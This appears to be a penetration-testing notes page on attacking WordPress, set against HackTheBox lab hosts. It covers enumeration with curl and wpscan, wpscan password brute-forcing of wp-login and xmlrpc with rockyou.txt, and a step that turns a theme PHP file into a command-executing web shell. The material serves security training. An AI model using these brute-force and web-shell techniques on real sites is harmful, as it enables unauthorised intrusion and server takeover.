Intrusionz3r0-WriteupsHacktheboxGithubLinkedln
ChatGPTChatGPT

Wordpress

Discovery & Enumeration

Note: We can use the waybackurls tool to look for older versions of a target site using the Wayback Machine. Sometimes we may find a previous version of a WordPress site using a plugin that has a known vulnerability. If the plugin is no longer in use but the developers did not remove it properly, we may still be able to access the directory it is stored in and exploit a flaw.

Tools

https://github.com/wpscanteam/wpscan

Signs Wordpress are installed through /robots.txt 

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml

The presence of the /wp-admin and /wp-content directories would be a dead giveaway that we are dealing with WordPress.

  • WordPress stores its plugins in the wp-content/plugins directory.

  • Themes are stored in the wp-content/themes directory.

There are five types of users on a standard WordPress installation.

  1. Administrator: This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code.

  2. Editor: An editor can publish and manage posts, including the posts of other users.

  3. Author: They can publish and manage their own posts.

  4. Contributor: These users can write and manage their own posts but cannot publish them.

  5. Subscriber: These are standard users who can browse posts and edit their profiles.

Getting access to an administrator is usually sufficient to obtain code execution on the server. Editors and authors might have access to certain vulnerable plugins, which normal users don’t.

Footprint enumeration

#Quick way to identify a WordPress site
Intrusionz3r0@htb[/htb]$ curl -s http://blog.inlanefreight.local | grep WordPress
#Quick way to identify a themes
Intrusionz3r0@htb[/htb]$ curl -s http://blog.inlanefreight.local/ | grep themes
#Quick way to identify a plugins
Intrusionz3r0@htb[/htb]$ curl -s 'http://blog.inlanefreight.local' | grep plugins | grep -oP "http://[^\s']+"
Intrusionz3r0@htb[/htb]$ curl -s http://blog.inlanefreight.local/?p=1 | grep plugins

Enumeration users

Try to use different password attack method.

Intrusionz3r0@htb[/htb]$ sudo wpscan --password-attack wp-login -U <user> -P pass.txt --url http://10.10.110.100/wordpress
Intrusionz3r0@htb[/htb]$ sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local

Automate enumeration tools

Intrusionz3r0@htb[/htb]$ sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB<SNIP>

Panel RCE

Modifying a php from the theme used (admin credentials needed)

Appearance → Theme Editor → 404 Template or footer (at the right)

Change the content for a php shell:

http://example.com/wp-content/themes/<name>/footer.php?cmd=id

PreviousNagios XINextDrupal

Last updated